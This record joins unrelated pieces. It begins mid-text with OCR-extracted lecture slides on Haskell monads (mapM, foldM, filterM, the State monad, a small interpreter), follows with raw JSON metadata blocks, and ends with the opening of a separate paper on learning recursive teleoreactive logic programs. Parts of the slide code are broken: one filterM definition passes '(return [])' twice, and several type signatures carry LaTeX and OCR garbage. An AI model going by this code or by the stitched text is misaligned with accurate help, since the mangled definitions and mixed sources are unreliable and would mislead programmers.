\end{verbatim} \[ \text{join } (\text{liftM } f \ m) \text{ is the same as } m >>= f \] “Apply } f \text{ to every object in } m \text{ and collect the results in the same Monad” sequence: “Execute” a List of Actions in Monad-Land Change a list of Monad-wrapped objects into a Monad-wrapped list of objects \[ \text{sequence} :: [\text{m a}] \to \text{m} [\text{a}] \] \[ \text{sequence}_\_ :: [\text{m a}] \to \text{m} () \] Prelude> \text{sequence} [\text{print 1, print 2, print 3}] 1 2 3 [(),(),()] Prelude> \text{sequence}_\_ [\text{putStrLn "Hello", putStrLn "World"}] Hello World Works more generally on Traversable types, not just lists mapM: Map Over a List in Monad-Land \[ \text{mapM} :: \text{Monad } m \Rightarrow (a \rightarrow m b) \rightarrow [a] \rightarrow m [b] \] \[ \text{mapM} _ :: \text{Monad } m \Rightarrow (a \rightarrow m b) \rightarrow [a] \rightarrow m () \quad -- \text{Discard result} \] Add 10 to each list element and log having seen it: \[ \text{> p10 x = writer } (x+10, ["saw " ++ show x]) :: \text{Writer } [\text{String}] \text{ Int} \] \[ \text{> runWriter } \$ \text{mapM p10 } [1..3] \] \[ ([11,12,13],["saw 1","saw 2","saw 3"]) \] Printing the elements of a list is my favorite use of mapM_: \[ \text{> mapM_ print } ([1..3] :: [\text{Int}]) \] \[ 1 2 3 \] Works more generally on Traversable types, not just lists Control.Monad.foldM: Left-Fold a List in Monad-Land \[ \text{foldl} :: \quad (a \rightarrow b \rightarrow a) \rightarrow a \rightarrow [b] \rightarrow a \] In \text{foldM}, the folding function operates and returns a result in a Monad: \[ \text{foldM} :: \text{Monad} m =\Rightarrow (a \rightarrow b \rightarrow m a) \rightarrow a \rightarrow [b] \rightarrow m a \] \[ \text{foldM} f a1 [x1, x2, \ldots, xm] = \text{do} \quad a2 <- f a1 x1 \\ \phantom{\text{do} \quad a2 <- f a1 x1} \quad a3 <- f a2 x2 \\ \phantom{\text{do} \quad a2 <- f a1 x1} \quad \ldots \\ \phantom{\text{do} \quad a2 <- f a1 x1} \quad f a m x m \] Example: Sum a list 
of numbers and report progress \[ > \text{runWriter} \$ \text{foldM} (\backslash a \ x \rightarrow \text{writer} (a+x, [(x,a)])) \ 0 \ [1..4] \] \[ (10,[(1,0),(2,1),(3,3),(4,6)]) \] “Add value \( x \) to accumulated result \( a \); log \( x \) and \( a \)” \[ \backslash a \ x \rightarrow \text{writer} (a+x, [(x,a)]) \] **Control.Monad.filterM**: Filter a List in Monad-land ```haskell filter :: (a -> Bool) -> [a] -> [a] filter p = foldr (\x acc -> if p x then x : acc else acc) [] ``` ```haskell filterM :: Monad m => (a -> m Bool) -> [a] -> m [a] filterM p = foldr (\x -> liftM2 (\k -> if k then (x:) else id) (p x)) (return []) (return []) ``` **filterM in action**: preserve small list elements; log progress ```haskell isSmall :: Int -> Writer [String] Bool isSmall x | x < 4 = writer (True, ["keep " ++ show x]) | otherwise = writer (False, ["reject " ++ show x]) ``` ```haskell > fst $ runWriter $ filterM isSmall [9,1,5,2,10,3] [1,2,3] > snd $ runWriter $ filterM isSmall [9,1,5,2,10,3] ["reject 9","keep 1","reject 5","keep 2","reject 10","keep 3"] ``` An Aside: Computing the Powerset of a List For a list \([x_1, x_2, \ldots]\), the answer consists of two kinds of lists: \[ \begin{bmatrix} [x_1, x_2, \ldots], \ldots, [x_1], [x_2, x_3, \ldots], \ldots, [] \end{bmatrix} \] - start with \(x_1\) - do not start with \(x_1\) \[ powerset :: [a] \rightarrow [[a]] \] \[ powerset [] = [[]] \quad \text{-- Tricky base case: } 2^\varnothing = \{\varnothing\} \] \[ powerset (x:xs) = \text{map} \ (x:) \ (\text{powerset} \ xs) ++ \text{powerset} \ xs \] \[ *\text{Main}*> \text{powerset} \ "abc" \[ ["abc","ab","ac","a","bc","b","c",""] \] The List Monad and Powersets \[ \text{powerset} (x:xs) = \text{map} (x:) (\text{powerset} \ xs) ++ \text{powerset} \ xs \] Let’s perform this step (i.e., possibly prepending \(x\) and combining) using the list Monad. 
Recall that liftM2 applies Monadic arguments to a two-argument function:

```haskell
liftM2 :: Monad m => (a -> b -> c) -> m a -> m b -> m c
```

So, for example, if a = Bool, b and c are [Char], and m is the list Monad,

```haskell
liftM2 :: (Bool -> [Char] -> [Char]) -> [Bool] -> [[Char]] -> [[Char]]
```

```
> liftM2 (\k -> if k then ('a':) else id) [True, False] ["bc", "d"]
["abc","ad","bc","d"]
```

liftM2 makes the function "nondeterministic" by applying it with every Bool in the first argument, i.e., both k = True (include 'a') and k = False (do not include 'a'), to every string in the second argument (["bc","d"]).

filterM Computes a Powerset: Like a Haiku, but Shorter

```haskell
foldr f z [x1, x2, ..., xn] = f x1 (f x2 (... (f xn z) ...))

filterM p = foldr (\x -> liftM2 (\k -> if k then (x:) else id) (p x))
                  (return [])

filterM p [x1, x2, ..., xn] =
  liftM2 (\k -> if k then (x1:) else id) (p x1)
    (liftM2 (\k -> if k then (x2:) else id) (p x2)
      ...
        (liftM2 (\k -> if k then (xn:) else id) (p xn) (return [])) ...)
```

If we let p _ = [True, False], this chooses to prepend x1 or not to the result of prepending x2 or not to ...
to return [] = [[]]:

```
Prelude> filterM (\_ -> [True, False]) "abc"
["abc","ab","ac","a","bc","b","c",""]
```

Functions as Monads

Much like functions are applicative functors, functions are Monads that apply the same argument to all their constituent functions.

```haskell
instance Monad ((->) r) where
  return x = \_ -> x          -- Just produce x
  h >>= f  = \w -> f (h w) w  -- Apply w to h and f

import Data.Char

isIDChar :: Char -> Bool                     -- ((->) Char) is the Monad
isIDChar = do l <- isLetter                  -- The Char argument
              n <- isDigit                   -- is applied to
              underscore <- (=='_')          -- all three of these functions
              return $ l || n || underscore  -- before their results are ORed

*Main> map isIDChar "12 aB_"
[True,True,False,True,True,True]
```

The State Monad: Modeling Computations with Side-Effects

The Writer Monad can only add to a state, not observe it. The State Monad addresses this by passing a state to each operation. In Control.Monad.State,

```haskell
newtype State s a = State { runState :: s -> (a, s) }

instance Monad (State s) where
  return x = State $ \s -> (x, s)
  State h >>= f = State $ \s -> let (a, s') = h s  -- First step
                                    State g = f a  -- Pass result to f
                                in  g s'           -- Second step

get      = State $ \s -> (s, s)     -- Make the state the result
put s    = State $ \_ -> ((), s)    -- Set the state
modify f = State $ \s -> ((), f s)  -- Apply a state update function
```

A State is not a state; it more resembles a state machine's next-state function: a is the type of the result, and s is the type of the state.

Example: An Interpreter for a Simple Imperative Language

```haskell
import qualified Data.Map as Map

type Store = Map.Map String Int  -- Value of each variable

-- Representation of a program (an AST)
data Expr = Lit Int          -- Numeric literal: 42
          | Add Expr Expr    -- Addition: 1 + 3
          | Var String       -- Variable reference: a
          | Asn String Expr  -- Variable assignment: a = 3 + 1
          | Seq [Expr]       -- Sequence of expressions: a = 3; b = 4;

-- Example program:
p :: Expr
p = Seq [ Asn "a" (Lit 3)    -- a = 3;
        ,
          Asn "b" (Add (Var "a") (Lit 1))  -- b = a + 1;
        , Add (Add (Var "a") bpp)          -- a + (b = b + 1) + b;
              (Var "b") ]
  where bpp = Asn "b" (Add (Var "b") (Lit 1))
```

Example: The Eval Function Taking a Store

```haskell
eval :: Expr -> Store -> (Int, Store)
eval (Lit n)     s = (n, s)                      -- Store unchanged
eval (Add e1 e2) s = let (n1, s')  = eval e1 s
                         (n2, s'') = eval e2 s'  -- Sees eval e1
                     in  (n1 + n2, s'')          -- Sees eval e2
eval (Var v)     s = case Map.lookup v s of      -- Look up v
                       Just n  -> (n, s)
                       Nothing -> error $ v ++ " undefined"
eval (Asn v e)   s = let (n, s') = eval e s
                     in  (n, Map.insert v n s')  -- Sees eval e
eval (Seq es)    s = foldl (\(_, ss) e -> eval e ss) (0, s) es
```

The fussy part here is "threading" the state through the computations.

Example: The Eval Function in Uncurried Form

```haskell
eval :: Expr -> (Store -> (Int, Store))
eval (Lit n)     = \s -> (n, s)                      -- Store unchanged
eval (Add e1 e2) = \s -> let (n1, s')  = eval e1 s
                             (n2, s'') = eval e2 s'  -- Sees eval e1
                         in  (n1 + n2, s'')          -- Sees eval e2
eval (Var v)     = \s -> case Map.lookup v s of      -- Look up v
                           Just n  -> (n, s)
                           Nothing -> error $ v ++ " undefined"
eval (Asn v e)   = \s -> let (n, s') = eval e s
                         in  (n, Map.insert v n s')  -- Sees eval e
eval (Seq es)    = \s -> foldl (\(_, ss) e -> eval e ss) (0, s) es
```
The parentheses around Store -> (Int, Store) are unnecessary: this is the same type as before.

Example: The Eval Function Using the State Monad

```haskell
eval :: Expr -> State Store Int
eval (Lit n)     = return n                    -- Store unchanged
eval (Add e1 e2) = do n1 <- eval e1
                      n2 <- eval e2            -- Sees eval e1
                      return $ n1 + n2         -- Sees eval e2
eval (Var v)     = do s <- get                 -- Get the store
                      case Map.lookup v s of
                        Just n  -> return n    -- Look up v
                        Nothing -> error $ v ++ " undefined"
eval (Asn v e)   = do n <- eval e
                      modify $ Map.insert v n  -- Sees eval e
                      return n                 -- Assigned value
eval (Seq es)    = foldM (\_ e -> eval e) 0 es -- Ignore value
```

The >>= operator threads the state through the computation.

The Eval Function in Action: runState, evalState, and execState

```
a = 3;
b = a + 1;
a + (b = b + 1) + b
```

```
*Main> :t runState (eval p) Map.empty
runState (eval p) Map.empty :: (Int, Store)  -- (Result, State)
*Main> :t evalState (eval p) Map.empty
evalState (eval p) Map.empty :: Int          -- Result only
*Main> evalState (eval p) Map.empty
13
*Main> :t execState (eval p) Map.empty
execState (eval p) Map.empty :: Store        -- State only
```
```
*Main> Map.toList $ execState (eval p) Map.empty
[("a",3),("b",5)]
```

Harnessing Monads

```haskell
data Tree a = Leaf a | Branch (Tree a) (Tree a) deriving Show
```

A function that works in a Monad can harness any Monad:

```haskell
mapTreeM :: Monad m => (a -> m b) -> Tree a -> m (Tree b)
mapTreeM f (Leaf x)     = do x' <- f x
                             return $ Leaf x'
mapTreeM f (Branch l r) = do l' <- mapTreeM f l
                             r' <- mapTreeM f r
                             return $ Branch l' r'
```

```haskell
toList :: Tree a -> [a]
toList t = execWriter $ mapTreeM (\x -> tell [x]) t  -- Log each leaf
```

```haskell
foldTree :: (a -> b -> b) -> b -> Tree a -> b
foldTree f s0 t = execState (mapTreeM (\x -> modify (f x)) t) s0
```

```haskell
sumTree :: Num a => Tree a -> a
sumTree t = foldTree (+) 0 t  -- Accumulate values using a stateful fold
```

Harnessing Monads

```
*Main> simpleTree = Branch (Leaf (1 :: Int)) (Leaf 2)
*Main> toList simpleTree
[1,2]
*Main> sumTree simpleTree
3
*Main> mapTreeM (\x -> Just (x + 10)) simpleTree
Just (Branch (Leaf 11) (Leaf 12))
*Main> mapTreeM print simpleTree
1
2
*Main> mapTreeM (\x -> [x, x+10]) simpleTree
[Branch (Leaf 1) (Leaf 2),Branch (Leaf 1) (Leaf 12),
 Branch (Leaf 11) (Leaf 2),Branch (Leaf 11) (Leaf 12)]
```
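Following the same pattern, one further example of my own (not from the slides above): harnessing the State Monad to relabel a tree's leaves with their left-to-right index. The declarations are repeated here so the sketch stands alone, with Eq derived for comparison.

```haskell
import Control.Monad.State

data Tree a = Leaf a | Branch (Tree a) (Tree a) deriving (Show, Eq)

mapTreeM :: Monad m => (a -> m b) -> Tree a -> m (Tree b)
mapTreeM f (Leaf x)     = Leaf   <$> f x
mapTreeM f (Branch l r) = Branch <$> mapTreeM f l <*> mapTreeM f r

-- Replace each leaf value with its left-to-right index,
-- threading a counter through the traversal in the State Monad
numberTree :: Tree a -> Tree Int
numberTree t = evalState (mapTreeM step t) 0
  where step _ = do n <- get     -- observe the counter
                    put (n + 1)  -- advance it
                    return n
```

For example, numberTree (Branch (Leaf 'a') (Branch (Leaf 'b') (Leaf 'c'))) yields Branch (Leaf 0) (Branch (Leaf 1) (Leaf 2)).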
{"Source-Url": "http://www1.cs.columbia.edu/~sedwards/classes/2020/4995-fall/monads.pdf", "len_cl100k_base": 10014, "olmocr-version": "0.1.53", "pdf-total-pages": 43, "total-fallback-pages": 0, "total-input-tokens": 74996, "total-output-tokens": 12317, "length": "2e13", "weborganizer": {"__label__adult": 0.0003993511199951172, "__label__art_design": 0.0003552436828613281, "__label__crime_law": 0.0002734661102294922, "__label__education_jobs": 0.0005679130554199219, "__label__entertainment": 6.979703903198242e-05, "__label__fashion_beauty": 0.00012624263763427734, "__label__finance_business": 9.572505950927734e-05, "__label__food_dining": 0.0004398822784423828, "__label__games": 0.0005192756652832031, "__label__hardware": 0.0005669593811035156, "__label__health": 0.0003814697265625, "__label__history": 0.00021207332611083984, "__label__home_hobbies": 9.524822235107422e-05, "__label__industrial": 0.0003287792205810547, "__label__literature": 0.00028395652770996094, "__label__politics": 0.00023853778839111328, "__label__religion": 0.0005359649658203125, "__label__science_tech": 0.006038665771484375, "__label__social_life": 0.0001010894775390625, "__label__software": 0.0033283233642578125, "__label__software_dev": 0.98388671875, "__label__sports_fitness": 0.0003018379211425781, "__label__transportation": 0.000438690185546875, "__label__travel": 0.00020396709442138672}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 29144, 0.03266]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 29144, 0.55045]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 29144, 0.53782]], "google_gemma-3-12b-it_contains_pii": [[0, 59, false], [59, 435, null], [435, 1216, null], [1216, 1627, null], [1627, 2399, null], [2399, 3054, null], [3054, 3974, null], [3974, 4536, null], [4536, 4916, null], [4916, 5381, null], [5381, 5864, null], [5864, 6352, null], [6352, 
6945, null], [6945, 7469, null], [7469, 7855, null], [7855, 8519, null], [8519, 9109, null], [9109, 9867, null], [9867, 10259, null], [10259, 10984, null], [10984, 11606, null], [11606, 12058, null], [12058, 12557, null], [12557, 13844, null], [13844, 14315, null], [14315, 15279, null], [15279, 16164, null], [16164, 16636, null], [16636, 17358, null], [17358, 18328, null], [18328, 19089, null], [19089, 19675, null], [19675, 20772, null], [20772, 21884, null], [21884, 22516, null], [22516, 23386, null], [23386, 24133, null], [24133, 25189, null], [25189, 26317, null], [26317, 27477, null], [27477, 28012, null], [28012, 28736, null], [28736, 29144, null]], "google_gemma-3-12b-it_is_public_document": [[0, 59, true], [59, 435, null], [435, 1216, null], [1216, 1627, null], [1627, 2399, null], [2399, 3054, null], [3054, 3974, null], [3974, 4536, null], [4536, 4916, null], [4916, 5381, null], [5381, 5864, null], [5864, 6352, null], [6352, 6945, null], [6945, 7469, null], [7469, 7855, null], [7855, 8519, null], [8519, 9109, null], [9109, 9867, null], [9867, 10259, null], [10259, 10984, null], [10984, 11606, null], [11606, 12058, null], [12058, 12557, null], [12557, 13844, null], [13844, 14315, null], [14315, 15279, null], [15279, 16164, null], [16164, 16636, null], [16636, 17358, null], [17358, 18328, null], [18328, 19089, null], [19089, 19675, null], [19675, 20772, null], [20772, 21884, null], [21884, 22516, null], [22516, 23386, null], [23386, 24133, null], [24133, 25189, null], [25189, 26317, null], [26317, 27477, null], [27477, 28012, null], [28012, 28736, null], [28736, 29144, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 29144, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, true], [5000, 29144, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 29144, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 29144, null]], 
"google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 29144, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 29144, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 29144, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 29144, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 29144, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 29144, null]], "pdf_page_numbers": [[0, 59, 1], [59, 435, 2], [435, 1216, 3], [1216, 1627, 4], [1627, 2399, 5], [2399, 3054, 6], [3054, 3974, 7], [3974, 4536, 8], [4536, 4916, 9], [4916, 5381, 10], [5381, 5864, 11], [5864, 6352, 12], [6352, 6945, 13], [6945, 7469, 14], [7469, 7855, 15], [7855, 8519, 16], [8519, 9109, 17], [9109, 9867, 18], [9867, 10259, 19], [10259, 10984, 20], [10984, 11606, 21], [11606, 12058, 22], [12058, 12557, 23], [12557, 13844, 24], [13844, 14315, 25], [14315, 15279, 26], [15279, 16164, 27], [16164, 16636, 28], [16636, 17358, 29], [17358, 18328, 30], [18328, 19089, 31], [19089, 19675, 32], [19675, 20772, 33], [20772, 21884, 34], [21884, 22516, 35], [22516, 23386, 36], [23386, 24133, 37], [24133, 25189, 38], [25189, 26317, 39], [26317, 27477, 40], [27477, 28012, 41], [28012, 28736, 42], [28736, 29144, 43]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 29144, 0.0]]}
olmocr_science_pdfs
2024-12-06
2024-12-06
e1df1d149485cea210da8fbc9c56b91a04a37dc5
[REMOVED]
{"Source-Url": "https://dc.exa.unrc.edu.ar/staff/naguirre/papers/icfem2004b.pdf", "len_cl100k_base": 8724, "olmocr-version": "0.1.50", "pdf-total-pages": 15, "total-fallback-pages": 0, "total-input-tokens": 46249, "total-output-tokens": 10295, "length": "2e13", "weborganizer": {"__label__adult": 0.0003173351287841797, "__label__art_design": 0.00031256675720214844, "__label__crime_law": 0.00028777122497558594, "__label__education_jobs": 0.0004911422729492188, "__label__entertainment": 3.9517879486083984e-05, "__label__fashion_beauty": 0.00012803077697753906, "__label__finance_business": 0.00017213821411132812, "__label__food_dining": 0.00032019615173339844, "__label__games": 0.0003528594970703125, "__label__hardware": 0.0006093978881835938, "__label__health": 0.0003933906555175781, "__label__history": 0.0001933574676513672, "__label__home_hobbies": 8.308887481689453e-05, "__label__industrial": 0.000377655029296875, "__label__literature": 0.0001908540725708008, "__label__politics": 0.00022041797637939453, "__label__religion": 0.00044345855712890625, "__label__science_tech": 0.00893402099609375, "__label__social_life": 7.027387619018555e-05, "__label__software": 0.003971099853515625, "__label__software_dev": 0.9814453125, "__label__sports_fitness": 0.0002574920654296875, "__label__transportation": 0.0004062652587890625, "__label__travel": 0.0001931190490722656}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 37007, 0.00938]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 37007, 0.23634]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 37007, 0.82509]], "google_gemma-3-12b-it_contains_pii": [[0, 2350, false], [2350, 5711, null], [5711, 7277, null], [7277, 9655, null], [9655, 12031, null], [12031, 15177, null], [15177, 17805, null], [17805, 20250, null], [20250, 23005, null], [23005, 25216, null], [25216, 26166, null], [26166, 28827, 
null], [28827, 31780, null], [31780, 34696, null], [34696, 37007, null]], "google_gemma-3-12b-it_is_public_document": [[0, 2350, true], [2350, 5711, null], [5711, 7277, null], [7277, 9655, null], [9655, 12031, null], [12031, 15177, null], [15177, 17805, null], [17805, 20250, null], [20250, 23005, null], [23005, 25216, null], [25216, 26166, null], [26166, 28827, null], [28827, 31780, null], [31780, 34696, null], [34696, 37007, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 37007, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 37007, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 37007, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 37007, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 37007, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 37007, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 37007, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 37007, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 37007, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 37007, null]], "pdf_page_numbers": [[0, 2350, 1], [2350, 5711, 2], [5711, 7277, 3], [7277, 9655, 4], [9655, 12031, 5], [12031, 15177, 6], [15177, 17805, 7], [17805, 20250, 8], [20250, 23005, 9], [23005, 25216, 10], [25216, 26166, 11], [26166, 28827, 12], [28827, 31780, 13], [31780, 34696, 14], [34696, 37007, 15]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 37007, 0.0]]}
olmocr_science_pdfs
2024-12-03
2024-12-03
056e0a7a8405bf6d69c1ef700ab6fe4e596ff4cc
[REMOVED]
{"len_cl100k_base": 13553, "olmocr-version": "0.1.53", "pdf-total-pages": 9, "total-fallback-pages": 0, "total-input-tokens": 35098, "total-output-tokens": 16639, "length": "2e13", "weborganizer": {"__label__adult": 0.00038051605224609375, "__label__art_design": 0.0006589889526367188, "__label__crime_law": 0.0006699562072753906, "__label__education_jobs": 0.0013055801391601562, "__label__entertainment": 0.00020015239715576172, "__label__fashion_beauty": 0.00022971630096435547, "__label__finance_business": 0.0011358261108398438, "__label__food_dining": 0.00034117698669433594, "__label__games": 0.000820159912109375, "__label__hardware": 0.002105712890625, "__label__health": 0.0008082389831542969, "__label__history": 0.0004718303680419922, "__label__home_hobbies": 0.00018787384033203125, "__label__industrial": 0.00079345703125, "__label__literature": 0.0004506111145019531, "__label__politics": 0.00046372413635253906, "__label__religion": 0.0005202293395996094, "__label__science_tech": 0.42919921875, "__label__social_life": 0.00016605854034423828, "__label__software": 0.040252685546875, "__label__software_dev": 0.517578125, "__label__sports_fitness": 0.00023996829986572263, "__label__transportation": 0.0005230903625488281, "__label__travel": 0.0002149343490600586}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 61638, 0.04558]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 61638, 0.19043]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 61638, 0.8712]], "google_gemma-3-12b-it_contains_pii": [[0, 5476, false], [5476, 12609, null], [12609, 20809, null], [20809, 26493, null], [26493, 34324, null], [34324, 41004, null], [41004, 47415, null], [47415, 53075, null], [53075, 61638, null]], "google_gemma-3-12b-it_is_public_document": [[0, 5476, true], [5476, 12609, null], [12609, 20809, null], [20809, 26493, null], [26493, 34324, null], [34324, 
41004, null], [41004, 47415, null], [47415, 53075, null], [53075, 61638, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 61638, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 61638, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 61638, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 61638, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 61638, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 61638, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 61638, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 61638, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 61638, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 61638, null]], "pdf_page_numbers": [[0, 5476, 1], [5476, 12609, 2], [12609, 20809, 3], [20809, 26493, 4], [26493, 34324, 5], [34324, 41004, 6], [41004, 47415, 7], [47415, 53075, 8], [53075, 61638, 9]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 61638, 0.11221]]}
olmocr_science_pdfs
2024-12-08
2024-12-08
f28a5f6d6930637a8d1ae066a075c60409cab47d
Learning Recursive Control Programs from Problem Solving

Pat Langley, Dongkyu Choi
Computational Learning Laboratory, Center for the Study of Language and Information, Stanford University, Stanford, CA 94305-4115 USA

Editors: Roland Olsson and Ute Schmid

Abstract

In this paper, we propose a new representation for physical control – teleoreactive logic programs – along with an interpreter that uses them to achieve goals. In addition, we present a new learning method that acquires recursive forms of these structures from traces of successful problem solving. We report experiments in three different domains that demonstrate the generality of this approach. In closing, we review related work on learning complex skills and discuss directions for future research on this topic.

Keywords: teleoreactive control, logic programs, problem solving, skill learning

1. Introduction

Human skills have a hierarchical character, with complex procedures defined in terms of more basic ones. In some domains, these skills are recursive in nature, in that structures are specified in terms of calls to themselves. Such recursive procedures pose a clear challenge for machine learning that deserves more attention than it has received in the literature. In this paper we present one response to this problem that relies on a new representation for skills and a new method for acquiring them from experience. We focus here on the task of learning controllers for physical agents. We are concerned with acquiring the structure and organization of skills, rather than tuning their parameters, which we view as a secondary learning issue. We represent skills as teleoreactive logic programs, a formalism that incorporates ideas from logic programming, reactive control, and hierarchical task networks.
This framework can encode hierarchical and recursive procedures that are considerably more complex than those usually studied in research on reinforcement learning (Sutton & Barto, 1998) and behavioral cloning (Sammut, 1996), but they can still be executed in a reactive yet goal-directed manner. As we will see, it also embodies constraints that make the learning process tractable. We assume that an agent uses hierarchical skills to achieve its goals whenever possible, but also that, upon encountering unfamiliar tasks, it falls back on problem solving. The learner begins with primitive skills for the domain, including knowledge of their applicability conditions and their effects, which lets it compose them to form candidate solutions. When the system overcomes such an impasse successfully, which may require substantial search, it learns a new skill that it stores in memory for use on future tasks. Thus, skill acquisition is incremental and intertwined with problem solving. Moreover, learning is cumulative in that skills acquired early on form the building blocks for those mastered later. We have incorporated our assumptions about representation, performance, and learning into ICARUS, a cognitive architecture for controlling physical agents. Any approach to acquiring hierarchical and recursive procedures from problem solving must address three issues. These concern identifying the hierarchical organization of the learned skills, determining when different skills should have the same name or head, and inferring the conditions under which each skill should be invoked. To this end, our approach to constructing teleoreactive logic programs incorporates ideas from previous work on learning and problem solving, but it also introduces some important innovations. In the next section, we specify our formalism for encoding initial and learned knowledge, along with the performance mechanisms that interpret them to produce behavior. 
After this, we present an approach to problem solving on novel tasks and a learning mechanism that transforms the results of this process into executable logic programs. Next, we report experimental evidence that the method can learn control programs in three recursive domains, as well as use them on tasks that are more complex than those on which they were acquired. We conclude by reviewing related work on learning and proposing some important directions for additional research. 2. Teleoreactive Logic Programs As we have noted, our approach revolves around a representational formalism for the execution of complex procedures – teleoreactive logic programs. We refer to these structures as “logic programs” because their syntax is similar to the Horn clauses used in Prolog and related languages. We have borrowed the term “teleoreactive” from Nilsson (1994), who used it to refer to systems that are goal driven but that also react to their current environment. His examples incorporated symbolic control rules but were not cast as logic programs, as we assume here. A teleoreactive logic program consists of two interleaved knowledge bases. One specifies a set of concepts that the agent uses to recognize classes of situations in the environment and describe them at higher levels of abstraction. These monotonic inference rules have the same semantics as clauses in Prolog and a similar syntax. Each clause includes a single head, stated as a predicate with zero or more arguments, along with a body that includes one or more positive literals, negative literals, or arithmetic tests. In this paper, we assume that a given head appears in only one clause, thus constraining definitions to be conjunctive, although the formalism itself allows disjunctive concepts. ICARUS distinguishes between primitive conceptual clauses, which refer only to percepts that the agent can observe in the environment, and complex clauses, which refer to other concepts in their bodies. 
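To make the representation concrete, here is a rough Haskell sketch of my own (the paper uses a Lisp-style syntax, and this is not ICARUS code): a conjunctive concept clause pairs a head literal with positive and negative body literals and arithmetic tests. The clear clause shown is hypothetical and simplified.

```haskell
-- Hypothetical encoding of conjunctive concept clauses
data Term = TVar String | TConst String deriving (Show, Eq)

data Literal = Literal { predicate :: String, args :: [Term] }
  deriving (Show, Eq)

data ConceptClause = ConceptClause
  { conceptHead :: Literal   -- e.g., (clear ?b)
  , positives   :: [Literal] -- positive body literals
  , negatives   :: [Literal] -- negated body literals
  , tests       :: [String]  -- arithmetic tests, left abstract here
  } deriving (Show, Eq)

-- (clear ?b) holds when no block ?x is on ?b: one negated literal
clearClause :: ConceptClause
clearClause = ConceptClause
  { conceptHead = Literal "clear" [TVar "?b"]
  , positives   = []
  , negatives   = [Literal "on" [TVar "?x", TVar "?b"]]
  , tests       = []
  }
```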
Specific percepts play the same role as ground literals in traditional logic programs, but, because they come from the environment and change over time, we do not consider them part of the program. Table 1 presents some concepts from the Blocks World. Concepts like unstackable and pickupable are defined in terms of the concepts clear, on, ontable, and hand-empty; the subconcept clear is defined in terms of on; and on is defined using two cases of the percept block, along with arithmetic tests on their attributes.

Table 1: Examples of concepts from the Blocks World.

    ((hand-empty)
     :percepts ((hand ?hand status ?status))
     :tests    ((eq ?status empty)))

A second knowledge base contains a set of skills that the agent can execute in the world. Each skill clause includes a head (a predicate with zero or more arguments) and a body that specifies a set of start conditions and one or more components. Primitive clauses have a single start condition (often a nonprimitive concept) and refer to executable actions that alter the environment. They also specify the effects of their execution, stated as literals that hold after their completion, and may state requirements that must hold during their execution. Table 2 shows the four primitive skills for the Blocks World, which are similar in structure and spirit to STRIPS operators, but may be executed in a durative manner. In contrast, nonprimitive skill clauses specify how to decompose activity into subskills. Because a skill may refer to itself, either directly or through a subskill, the formalism supports recursive definitions. For this reason, nonprimitive skills do not specify effects,

Table 2: Primitive skills for the Blocks World domain. Each skill clause has a head that specifies its name and arguments, a set of typed variables, a single start condition, a set of effects, and a set of executable actions, each marked by an asterisk.
